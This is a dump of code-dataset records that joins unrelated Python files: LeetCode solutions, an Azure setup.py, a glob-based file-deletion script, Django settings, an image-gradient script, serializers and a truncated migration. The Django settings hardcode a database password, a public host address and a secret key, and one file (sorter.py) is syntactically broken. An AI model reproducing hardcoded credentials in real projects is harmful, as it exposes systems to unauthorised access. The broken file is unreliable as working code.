# Total Accepted: 13.9K
# Total Submissions: 40K
# Testcase Example: '"ADOBECODEBANC"\n"ABC"'
#
# 给你一个字符串 S、一个字符串 T,请在字符串 S 里面找出:包含 T 所有字母的最小子串。
#
# 示例:
#
# 输入: S = "ADOBECODEBANC", T = "ABC"
# 输出: "BANC"
#
# 说明:
#
#
# 如果 S 中不存这样的子串,则返回空字符串 ""。
# 如果 S 中存在这样的子串,我们保证它是唯一的答案。
#
#
#
# @lc code=start
class Solution:
def minWindow(self, s: str, t: str) -> str:
from collections import defaultdict
lookup = defaultdict(int)
for c in t:
lookup[c] += 1
start = 0
end = 0
min_len = float("inf")
counter = len(t)
res = ""
while end < len(s):
if lookup[s[end]] > 0:
counter -= 1
lookup[s[end]] -= 1
end += 1
while counter == 0:
if min_len > end - start:
min_len = end - start
res = s[start:end]
if lookup[s[start]] == 0:
counter += 1
lookup[s[start]] += 1
start += 1
return res
# @lc code=end
| [
"[email protected]"
] | |
8e9aecb12e6e5e2f8c0bc687ca323a81ccf17b40 | 4935e2ef7994222178f950319f9f8d3e2adfa543 | /summer/2018_07_26/4sum-ii.py | 93f49d2327c742fa53619df9e5a30f374a233dd2 | [] | no_license | shaheming/leecode | e853b59469b97ca97a5b4ecd80497b3dac3fb10f | a8b59573dc201438ebd5a5ab64e9ac61255a4abd | refs/heads/master | 2021-07-03T03:57:22.718410 | 2019-04-06T18:19:53 | 2019-04-06T18:19:53 | 140,241,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | #这个问题本来是一个 O(N^4) 但是通过拆解可以拆解为两个 O(2*N^2) 的问题
class Solution:
def fourSumCount(self, A, B, C, D):
"""
:type A: List[int]
:type B: List[int]
:type C: List[int]
:type D: List[int]
:rtype: int
"""
count = 0
dicA, dicB, dicC, dicD = {}, {}, {}, {}
for a in A:
for b in B:
if a + b in dicA:
dicA[a + b] += 1
else:
dicA[a + b] = 1
for c in C:
for d in D:
if -(c + d) in dicA:
count += dicA[-(c + d)]
return count
| [
"[email protected]"
] | |
4d7505d380777b2beba7bed17181483a5992b5c4 | da9b9f75a693d17102be45b88efc212ca6da4085 | /sdk/appconfiguration/azure-appconfiguration/setup.py | cbab0ebedf6658d7f5da30366ae1070a9eca46c9 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | elraikhm/azure-sdk-for-python | e1f57b2b4d8cc196fb04eb83d81022f50ff63db7 | dcb6fdd18b0d8e0f1d7b34fdf82b27a90ee8eafc | refs/heads/master | 2021-06-21T22:01:37.063647 | 2021-05-21T23:43:56 | 2021-05-21T23:43:56 | 216,855,069 | 0 | 0 | MIT | 2019-10-22T16:05:03 | 2019-10-22T16:05:02 | null | UTF-8 | Python | false | false | 3,251 | py | #!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import sys
import re
import os.path
from io import open
from setuptools import find_packages, setup
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-appconfiguration"
PACKAGE_PPRINT_NAME = "App Configuration Data"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
# Fail fast with a helpful message if the legacy monolithic `azure`
# package (the one exposing __version__) is installed alongside this one.
try:
    import azure
    try:
        ver = azure.__version__
        raise Exception(
            'This package is incompatible with azure=={}. '.format(ver) +
            'Uninstall it with "pip uninstall azure".'
        )
    except AttributeError:
        # No __version__ attribute: a modern namespace package -- fine.
        pass
except ImportError:
    # `azure` not installed at all -- also fine.
    pass
# Version extraction inspired from 'requests'
# (reads VERSION = "..." out of _version.py without importing the package)
with open(os.path.join(package_folder_path, '_version.py'), 'r') as fd:
    version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
                        fd.read(), re.MULTILINE).group(1)
if not version:
    raise RuntimeError('Cannot find version information')
# Long description shown on PyPI: README followed by the changelog.
with open('README.md', encoding='utf-8') as f:
    readme = f.read()
with open('HISTORY.md', encoding='utf-8') as f:
    history = f.read()
exclude_packages = [
    'tests',
    'samples',
    # Exclude packages that will be covered by PEP420 or nspkg
    'azure',
]
if sys.version_info < (3, 5, 3):
    # The async sub-packages require Python >= 3.5.3; exclude them otherwise.
    exclude_packages.extend([
        '*.aio',
        '*.aio.*'
    ])
setup(
    name=PACKAGE_NAME,
    version=version,
    description='Microsoft {} Library for Python'.format(PACKAGE_PPRINT_NAME),
    # PyPI long description: README + changelog, rendered as Markdown.
    long_description=readme + '\n\n' + history,
    long_description_content_type='text/markdown',
    license='MIT License',
    author='Microsoft Corporation',
    author_email='[email protected]',
    url='https://github.com/Azure/azure-sdk-for-python/tree/master/sdk/appconfiguration/azure-appconfiguration',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        'License :: OSI Approved :: MIT License',
    ],
    zip_safe=False,
    # Package discovery honours the exclusions computed above.
    packages=find_packages(exclude=exclude_packages),
    install_requires=[
        "msrest>=0.6.10",
        "azure-core<2.0.0,>=1.0.0b5",
    ],
    # Environment-marker extras: compatibility backports for old Pythons
    # and the aiohttp/aiodns transport for the async client.
    extras_require={
        ":python_version<'3.0'": ['azure-nspkg'],
        ":python_version<'3.4'": ['enum34>=1.0.4'],
        ":python_version<'3.5'": ['typing'],
        "async:python_version>='3.5'": [
            'aiohttp>=3.0',
            'aiodns>=2.0'
        ],
    }
) | [
"[email protected]"
] | |
f05dbdfaed6829910b7b2a59590a20e33ca3f67a | de3508314b95b8dff009c186c446f78c6e29458d | /crwlremoveirrelevant.py | 1f562f0fb719036ae33c375510e5704be3309f6f | [] | no_license | GithubPriya/Ache-Crawler | d5d336315ecf3b475e18cb45497d9ac4926f7ed9 | 6c7f06f0cbddb7301bba911f6847ca2ad284e9da | refs/heads/master | 2021-05-08T08:00:03.582890 | 2017-10-16T02:53:26 | 2017-10-16T02:53:26 | 106,982,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | '''
Created on Sep 11, 2017
@author: admin_home
'''
import os
import glob
# NOTE(review): f_path is collected but never used -- the globs below run
# against the current working directory, not under f_path; presumably an
# os.chdir(f_path) was intended.  TODO confirm.
f_path = raw_input('Enter path : ')
# Delete every file whose name contains "favicon".
for hgx in glob.glob("*favicon*"):
    os.remove(hgx)
# Delete every file whose name contains "full-frame".
for hgx in glob.glob("*full-frame*"):
    os.remove(hgx)
# Files *ending* in "eyeglasses" (note: no trailing wildcard); print each
# name before deleting it.
for hgx in glob.glob("*eyeglasses"):
    print hgx
    os.remove(hgx)
| [
"[email protected]"
] | |
f8568e77c3e2310bd5d6c4a15288dd45bdcee7e4 | 3aaa2da49ef0f20897aa6580dc976d362d944aa8 | /parserInfor/parserInfor/settings.py | 5be1b2fbdf83292e2c4568e96ce0e2b77cdd6cc9 | [] | no_license | loyoen/parser | 8b995a70c06daba109a977ed888488a13a174e3e | 48323a01696d6cf4909fe1ca659acb825e6e2f3c | refs/heads/master | 2016-09-05T13:47:17.552809 | 2013-09-21T06:09:22 | 2013-09-21T06:09:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,624 | py | # Django settings for parserInfor project.
import os
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
    # ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
# SECURITY NOTE(review): real-looking credentials and a public host IP are
# committed here; they should be moved out of source control (e.g. into
# environment variables) before this settings file is shared.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
        'NAME': 'cisimi', # Or path to database file if using sqlite3.
        # The following settings are not used with sqlite3:
        'USER': 'root',
        'PASSWORD': 'good7788',
        'HOST': '60.190.203.111', # Empty for localhost through domain sockets or '127.0.0.1' for localhost through TCP.
        'PORT': '', # Set to empty string for default.
    }
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
# NOTE(review): re-assigned to False at the bottom of this file; the later
# assignment is the one that takes effect.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
# NOTE(review): the doubled "MEDIA_ROOT = MEDIA_ROOT = ..." assignment is
# harmless but looks like a typo.
MEDIA_ROOT = MEDIA_ROOT = os.path.join(os.path.dirname(__file__),'site_media').replace('\\','/')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
    # Put strings here, like "/home/html/static" or "C:/www/django/static".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    # 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'o&+ss2f3d^(c%no$pzqnk+9l+fc51h#1i^ssq@w)bj+*n*yoe1'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
    'django.template.loaders.filesystem.Loader',
    'django.template.loaders.app_directories.Loader',
    # 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
    'django.middleware.common.CommonMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    # Uncomment the next line for simple clickjacking protection:
    # 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'parserInfor.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'parserInfor.wsgi.application'
TEMPLATE_DIRS = (
    os.path.join(os.path.dirname(__file__), 'template').replace('\\','/'),
    # Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
    # Always use forward slashes, even on Windows.
    # Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.sites',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # Uncomment the next line to enable the admin:
    # 'django.contrib.admin',
    # Uncomment the next line to enable admin documentation:
    # 'django.contrib.admindocs',
    'myparser',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
    'version': 1,
    'disable_existing_loggers': False,
    'filters': {
        'require_debug_false': {
            '()': 'django.utils.log.RequireDebugFalse'
        }
    },
    'handlers': {
        'mail_admins': {
            'level': 'ERROR',
            'filters': ['require_debug_false'],
            'class': 'django.utils.log.AdminEmailHandler'
        }
    },
    'loggers': {
        'django.request': {
            'handlers': ['mail_admins'],
            'level': 'ERROR',
            'propagate': True,
        },
    }
}
# Overrides the USE_TZ = True defined earlier: naive datetimes are used.
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
| [
"Zenas@MICROSO-5K70BVP.(none)"
] | Zenas@MICROSO-5K70BVP.(none) |
0d4d2f42a60514dcf7d62b89f9738cd4d00ee8a1 | 68b95073dd0b07314fdfd0a906fd652f5f402eaf | /hog.py | 4d8954d10db373049fc9aa6ecc260eaa918698a0 | [] | no_license | suryaakella/computer-vision-moocs | 23b455d43eb1501d764178e1a0a22bc47b23cad4 | 213099e8d3e5e58feae69b045518fb9463919e60 | refs/heads/main | 2023-01-22T19:12:33.330676 | 2020-11-24T15:01:35 | 2020-11-24T15:01:35 | 315,661,885 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,678 | py | import matplotlib.pyplot as plt
import cv2
import numpy as np
import math
def gaussian(x,y,std):
    """Evaluate the 2-D Gaussian density with standard deviation *std* at (x, y).

    Bug fix: the original exponent was ``-(x**2 + y**2) / 2 * (std**2)`` --
    operator precedence made it *multiply* by std**2 instead of dividing by
    2*std**2, so every std != 1 produced a wrong kernel.  The exponent is
    now the standard ``-(x**2 + y**2) / (2 * std**2)``.
    """
    norm = 1.0 / ((std ** 2) * (2 * math.pi))  # normalisation constant, unchanged
    return norm * np.exp(-(x ** 2 + y ** 2) / (2.0 * (std ** 2)))
# Load the input frame as grayscale (flag 0) from an absolute, machine-specific
# path.  NOTE(review): cv2.imread returns None when the file is missing, which
# would make the resize below fail -- confirm the path before running.
originalimg = cv2.imread('/home/surya/Documents/computer_vision/CAP5415_Fall2012_PA3_data/Seq1/0133.jpeg',0)
# Resize to 64x128, the usual HOG detection-window size.
originalimg=cv2.resize(originalimg, (64,128))
def conv(originalimg, k,size,std1):
    """Correlate *originalimg* with a named 3x3 kernel and return the result.

    *k* selects the kernel: 'averaging' (box filter), 'gaussian' (built from
    gaussian(i, j, std1)), 'sobel1'/'sobel2' (Sobel y/x derivatives) or
    'p1'/'p2' (Prewitt x/y derivatives).  *size* is only honoured by the
    'averaging' branch; all other branches force a 3x3 kernel.
    """
    if(k=='averaging'):
        # NOTE(review): divisor is hard-coded to 9, so for size != 3 this is
        # not a true mean filter.
        gaus = np.ones((size,size))/9
    elif(k=='gaussian'):
        gaus = np.zeros((3,3))
        # NOTE(review): `std` and `mean` are assigned here but never used below.
        std = std1
        mean = np.array(np.arange(-3,3))
        # Sample the Gaussian on the 3x3 grid centred at the origin.
        for i in range(-1,2):
            for j in range(-1,2):
                gaus[i+1][j+1] = gaussian(i,j,std1)
        # print('gaus',gaus)
    elif(k=='sobel1'):
        # Sobel kernel for the vertical (row/y) derivative.
        gaus = np.array([[-1,-2,-1],[0,0,0],[1,2,1]])
        size = 3
    elif(k=='sobel2'):
        # Sobel kernel for the horizontal (column/x) derivative.
        gaus = np.array([[-1,0,1],[-2,0,2],[-1,0,1]])
        size = 3
    elif(k=='p1'):
        # Prewitt kernel for the horizontal (x) derivative.
        gaus = np.array([[-1,0,1],[-1,0,1],[-1,0,1]])
        size = 3
    elif(k=='p2'):
        # Prewitt kernel for the vertical (y) derivative.
        gaus = np.array([[1,1,1],[0,0,0],[-1,-1,-1]])
        size = 3
    # Output accumulator with the same height/width as the input image.
    c = np.zeros((int(originalimg.shape[0]),int(originalimg.shape[1])))
    for i in range(0,int(originalimg.shape[0])):
        for j in range(0,int(originalimg.shape[1])):
            patch = originalimg[i:i+3,j:j+3]
            try:
                # Element-wise multiply-and-sum of the 3x3 window with the
                # kernel.  The bare except silently skips windows near the
                # border whose shape does not match the kernel.
                c[i+1][j+1] = (np.sum(np.multiply(patch,gaus)))
            except:
                pass
    return c
# Horizontal and vertical Prewitt derivatives of the image.
fx = conv(originalimg,'p1',3,1)
fy = conv(originalimg,'p2',3,1)
# Per-pixel gradient magnitude.
m = np.sqrt(fx**2 + fy**2)
plt.subplot(1,2,1)
plt.imshow(m,cmap='gray')
plt.title('magnitude')
# Per-pixel gradient direction.  NOTE(review): fx can contain zeros, so this
# division may emit divide-by-zero warnings / NaNs -- np.arctan2(fy, fx)
# would be the safe form.  Confirm before changing behaviour.
orientation = np.arctan(fy/fx)
plt.subplot(1,2,2)
plt.hist(orientation)
plt.title('direction')
plt.show()
| [
"[email protected]"
] | |
3541096c6c8edd5bcc12e74e32dadbffe14fcc02 | 9b452055112184e16259ba95d83e0746d9e57714 | /FennicaTrends/serious-spin-master/data/python/countRelativeWeights.py | a2fcfb623573ab41ce92ae5c1872899437f2dad3 | [
"MIT"
] | permissive | helsinkithinkcompany/wide | 9bb836f9b50a65093d32c9b2827dbbf5a7bfd42f | 637189b83499bb612fcefa94e2af88f1f920849c | refs/heads/master | 2020-03-28T17:25:38.619458 | 2018-10-30T17:40:40 | 2018-10-30T17:40:40 | 148,788,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | import json, sys
from math import pow
# FILE HANDLING #
def writeJsonToFile(json_data, file_path):
    """Serialise *json_data* as JSON into *file_path*.

    Returns True on success; on any failure prints the error plus a short
    message and returns False instead of raising.
    """
    try:
        with open(file_path, 'w') as handle:
            json.dump(json_data, handle)
    except Exception as err:
        print(err)
        print('Failed to dump json to file ' + file_path)
        return False
    return True
def getJsonFromFile(file_path):
    """Load and return the JSON content of *file_path*.

    On any failure (missing file, bad JSON, ...) prints the error plus a
    short message and returns False instead of raising.
    """
    try:
        with open(file_path) as handle:
            return json.load(handle)
    except Exception as err:
        print(err)
        print('Failed to get json from file ' + file_path)
        return False
# Require the input JSON file (year -> {word: count}) as the first CLI argument.
if len(sys.argv) < 2:
    print("Usage: %s fennica-all.json"%sys.argv[0])
    sys.exit()
fennica_all = getJsonFromFile(sys.argv[1])
# NOTE(review): this constant is never referenced -- the output path is
# written as the literal 'fennica-graph.json' at the bottom of the script.
PATH_TO_FENNICA_ALL_JSON_FILE = './fennica-graph.json'
# DATA HANDLING #
def countMagicValue(this, mean, max):
    """Map a raw word count onto a 0-100 scale centred on the yearly mean.

    A value whose truncated int equals the truncated mean maps to 50; values
    below the mean shrink towards 0 and values above it grow towards 100,
    with the spread scaled by the distance between mean and max.

    Bug fix: the original ended with an unreachable ``else: return 50``
    branch (the three conditions above it are exhaustive); it has been
    removed.  Numeric behaviour is unchanged, including the deliberate
    int() truncation of *this* and *mean*.  Note: *max* shadows the builtin
    (kept for interface compatibility).
    """
    if int(this) == int(mean):
        return 50
    if int(this) < int(mean):
        # Below the mean: squeeze into [0, 50).
        diff = 1 + (int(mean) - int(this)) / mean
        return int(50 - 50 * (1 - 1 / diff))
    # int(this) > int(mean): stretch into (50, 100].
    diff = 1 + (int(this) - int(mean)) / (max - mean)
    return int(50 + 50 * (1 - 1 / diff))
def getMeanAndMaxOfYear(json_data, year):
    """Return ``(mean, max)`` of the word counts stored under *year*.

    Both values are returned as floats; the maximum is never below 0.
    """
    counts = list(json_data[year].values())
    # Seed with 0 so the result matches the original accumulator behaviour.
    highest = max([0] + counts)
    return float(sum(counts)) / float(len(counts)), float(highest)
def changeWordWeightsToRelativeOfMeanByYear(json_data, year):
    """Rescale every word count of *year* in place via countMagicValue()."""
    mean_count, max_count = getMeanAndMaxOfYear(json_data, year)
    year_counts = json_data[year]
    for word, count in year_counts.items():
        year_counts[word] = countMagicValue(float(count), mean_count, max_count)
def changeWordWeightsToRelative(json_data):
    """Rescale all years' word counts in place and return *json_data*."""
    for year in list(json_data):
        changeWordWeightsToRelativeOfMeanByYear(json_data, year)
    return json_data
# Rescale every year's word counts onto the 0-100 relative scale and save.
fennica_all_relative = changeWordWeightsToRelative(fennica_all)
writeJsonToFile(fennica_all_relative, 'fennica-graph.json')
| [
"[email protected]"
] | |
61acdb8d432dd34f001d2c0e97dfee241beada2b | 0bcc7dba1f5f1738f9b11a259e63edcb39795a41 | /INFO1110/Lab6/sorter.py | c8f145941317de52a6354f0f760cb64eeb835ec3 | [] | no_license | mlumsden001/University-Notes | 3704b0a0e49a24d965aa24658a607a89c1dfa7da | e0040192204360e3bd3df7087738913c7763a331 | refs/heads/master | 2021-08-15T20:19:18.527082 | 2021-03-22T05:41:11 | 2021-03-22T05:41:11 | 246,731,613 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | import sys
def sort(sys.argv[1]):
| [
"[email protected]"
] | |
e8a926f2b15c77f420a41eec66fda7a533d53b54 | 7d07cff7e0900fecb15d433eb9962a809585447f | /hit_me_please/hitters/models.py | ab8922594a759c7f8b586d3cb1c5d6338a87c1b0 | [
"MIT"
] | permissive | kaotu/HitMePls | 4dcb5280b50333b92d29de90260457680a617cc8 | 7b105e39517300faf9ef31b455656d69746cdcef | refs/heads/master | 2022-12-10T03:30:06.488569 | 2019-06-04T02:44:04 | 2019-06-04T02:44:04 | 189,680,252 | 0 | 0 | MIT | 2022-12-09T04:42:41 | 2019-06-01T02:14:03 | JavaScript | UTF-8 | Python | false | false | 131 | py | from django.db import models
# Create your models here.
class Hitter(models.Model):
    """A record holding a single subscriber e-mail address."""
    # Generous max_length; Django's EmailField default is 254 chars.
    email = models.EmailField(max_length=300)
| [
"[email protected]"
] | |
32c207f3631eab9b520c22cef2980be18016e080 | 8b7d98c5077d1607568460ce5ae8da801b11293a | /accounts/forms.py | f47b51e9149eed83879485476cefed208ceca865 | [] | no_license | Th0rn-dev/kiteupru | de0e93fd791522433e2ab34efac1e86a0cb0f613 | df240ff50f51b390f7e27ca35841c6482642d97d | refs/heads/master | 2023-05-04T13:44:05.561708 | 2021-05-30T19:01:59 | 2021-05-30T19:45:47 | 372,293,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 161 | py | from django import forms
from .models import Profile
class ProfileForm(forms.ModelForm):
    """ModelForm exposing only the ``avatar`` field of ``Profile``."""
    class Meta:
        model = Profile
        fields = ('avatar',)
"[email protected]"
] | |
083b8cd284fd20bc221ed0ecb3cbff91911ffaeb | 73e29861ef02f3c95fbcdf095b8d539bbc5fd61f | /apps/news/serializers.py | 79c74eea0caeec78406002bf1beb61613eab759d | [] | no_license | jc5055/xfz | 8cbc6b356f5707185d09df07f9bb9d0b03593e91 | 95c275e65543b379fc6b25489c381edbc41dc034 | refs/heads/master | 2022-12-11T18:59:52.464298 | 2020-09-02T09:07:32 | 2020-09-02T09:07:32 | 289,928,051 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 878 | py | from rest_framework import serializers
from .models import News, NewsCategory, Comment, Banner
from apps.xfzauth.serializers import AuthSerializer
class NewsCategorySerializers(serializers.ModelSerializer):
    """Serialises a NewsCategory as its id and name."""
    class Meta:
        model = NewsCategory
        fields = ('id', 'name')
class NewsSerializer(serializers.ModelSerializer):
    """Serialises a News item with its nested category and author."""
    category = NewsCategorySerializers()
    author = AuthSerializer()
    class Meta:
        model = News
        fields = ('id', 'title', 'desc', 'thumbnail', 'pub_time', 'category', 'author')
class NewsCommentSerializer(serializers.ModelSerializer):
    """Serialises a Comment with its nested author."""
    author = AuthSerializer()
    class Meta:
        model = Comment
        fields = ('id', 'content', 'pub_time', 'author')
class BannerSerializer(serializers.ModelSerializer):
    """Serialises a Banner entry (priority-ordered image link)."""
    class Meta:
        model = Banner
        fields = ('id', 'priority', 'image_url', 'link_to')
| [
"[email protected]"
] | |
615fbeee59e36cc1c78df2d2ff2d9ed58a64158d | f555fbb80462bd5ad260256520bd324109fd5fc7 | /users/migrations/0001_initial.py | 74de2b26de2064e35d33dd7db5aa427540ec3b2c | [] | no_license | Sunki12/Accompany | 9acb4a48584eaf3693b0627676ec4fd0c3ee1b73 | 4100989cc545dc9104702d99b31d9c3c234c986c | refs/heads/master | 2020-07-10T10:43:18.918395 | 2019-08-25T04:09:51 | 2019-08-25T04:09:51 | 204,244,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,145 | py | # Generated by Django 2.2.2 on 2019-06-28 11:04
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial, auto-generated schema: Doctor, Guardian, Patient and
    VerifyCode tables, plus the TreatShip / GuardianShip / Appointment
    relation tables.  Field verbose_names are Chinese UI labels and must
    not be altered here; edit the models and regenerate instead."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Doctor',
            fields=[
                ('name', models.CharField(max_length=128, verbose_name='姓名')),
                ('password', models.CharField(max_length=60, verbose_name='密码')),
                ('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
                ('doctor_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
                ('working_unit', models.CharField(max_length=30, verbose_name='从业单位')),
                ('working_num', models.CharField(max_length=30, verbose_name='工号')),
                ('working_title', models.CharField(max_length=30, verbose_name='职称')),
                ('resume', models.TextField(max_length=1000, verbose_name='简介')),
            ],
            options={
                'db_table': 'Doctor',
            },
        ),
        migrations.CreateModel(
            name='Guardian',
            fields=[
                ('name', models.CharField(max_length=128, verbose_name='姓名')),
                ('password', models.CharField(max_length=60, verbose_name='密码')),
                ('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
                ('guardian_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
            ],
            options={
                'db_table': 'guardian',
            },
        ),
        migrations.CreateModel(
            name='Patient',
            fields=[
                ('name', models.CharField(max_length=128, verbose_name='姓名')),
                ('password', models.CharField(max_length=60, verbose_name='密码')),
                ('phone_number', models.CharField(max_length=11, unique=True, verbose_name='手机号')),
                ('patient_id', models.CharField(max_length=18, primary_key=True, serialize=False, verbose_name='身份证号')),
                ('longitude', models.CharField(blank=True, max_length=30, null=True, verbose_name='经度')),
                ('latitude', models.CharField(blank=True, max_length=30, null=True, verbose_name='纬度')),
                ('heart_rate', models.CharField(blank=True, max_length=10, null=True, verbose_name='心率')),
                ('blood_pressure', models.CharField(blank=True, max_length=10, null=True, verbose_name='血压')),
                ('step_number', models.CharField(blank=True, max_length=10, null=True, verbose_name='步数')),
                ('gender', models.CharField(blank=True, choices=[('male', '男'), ('female', '女')], max_length=6, null=True, verbose_name='性别')),
                ('marriage', models.CharField(blank=True, choices=[('YES', '已婚'), ('NO', '未婚')], max_length=20, null=True, verbose_name='婚姻状况')),
                ('age', models.CharField(blank=True, max_length=6, verbose_name='年龄')),
                ('job', models.CharField(blank=True, max_length=200, null=True, verbose_name='工作')),
                ('nation', models.CharField(blank=True, max_length=20, null=True, verbose_name='民族')),
                ('native_place', models.CharField(blank=True, max_length=200, null=True, verbose_name='籍贯')),
                ('address', models.CharField(blank=True, max_length=200, null=True, verbose_name='住址')),
                ('main_illness', models.CharField(blank=True, max_length=100, null=True, verbose_name='主要疾病')),
            ],
            options={
                'db_table': 'patient',
            },
        ),
        migrations.CreateModel(
            name='VerifyCode',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('code', models.CharField(max_length=10, verbose_name='验证码')),
                ('phone_number', models.CharField(max_length=11, verbose_name='手机号')),
                ('add_time', models.CharField(max_length=50, verbose_name='添加时间')),
            ],
        ),
        migrations.CreateModel(
            name='TreatShip',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('illness_now', models.TextField(blank=True, max_length=1000, null=True, verbose_name='现今病情')),
                ('illness_past', models.TextField(blank=True, max_length=1000, null=True, verbose_name='以往病史')),
                ('sub_visit_time', models.CharField(blank=True, max_length=30, null=True, verbose_name='复诊时间')),
                ('treatment', models.TextField(blank=True, max_length=1000, null=True, verbose_name='治疗方案')),
                ('medicine', models.TextField(blank=True, max_length=1000, null=True, verbose_name='服药信息')),
                ('treat_time', models.CharField(max_length=200, verbose_name='治疗时间')),
                ('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Doctor', verbose_name='医生身份证号')),
                ('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian')),
                ('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='treatment', to='users.Patient', verbose_name='病人身份证号')),
            ],
            options={
                'db_table': 'treatShip',
                'unique_together': {('patient', 'doctor', 'guardian', 'treat_time')},
            },
        ),
        migrations.CreateModel(
            name='GuardianShip',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('guard_time', models.CharField(max_length=30, null=True, verbose_name='监护时间')),
                ('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian', verbose_name='监护人身份证号')),
                ('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Patient', verbose_name='病人身份证号')),
            ],
            options={
                'db_table': 'guardianShip',
            },
        ),
        migrations.AddField(
            model_name='guardian',
            name='cares',
            field=models.ManyToManyField(related_name='carers', through='users.GuardianShip', to='users.Patient'),
        ),
        migrations.AddField(
            model_name='doctor',
            name='patients',
            field=models.ManyToManyField(related_name='doctors', through='users.TreatShip', to='users.Patient'),
        ),
        migrations.AlterUniqueTogether(
            name='doctor',
            unique_together={('working_unit', 'working_num')},
        ),
        migrations.CreateModel(
            name='Appointment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('appointment_time', models.CharField(max_length=50, verbose_name='预约时间')),
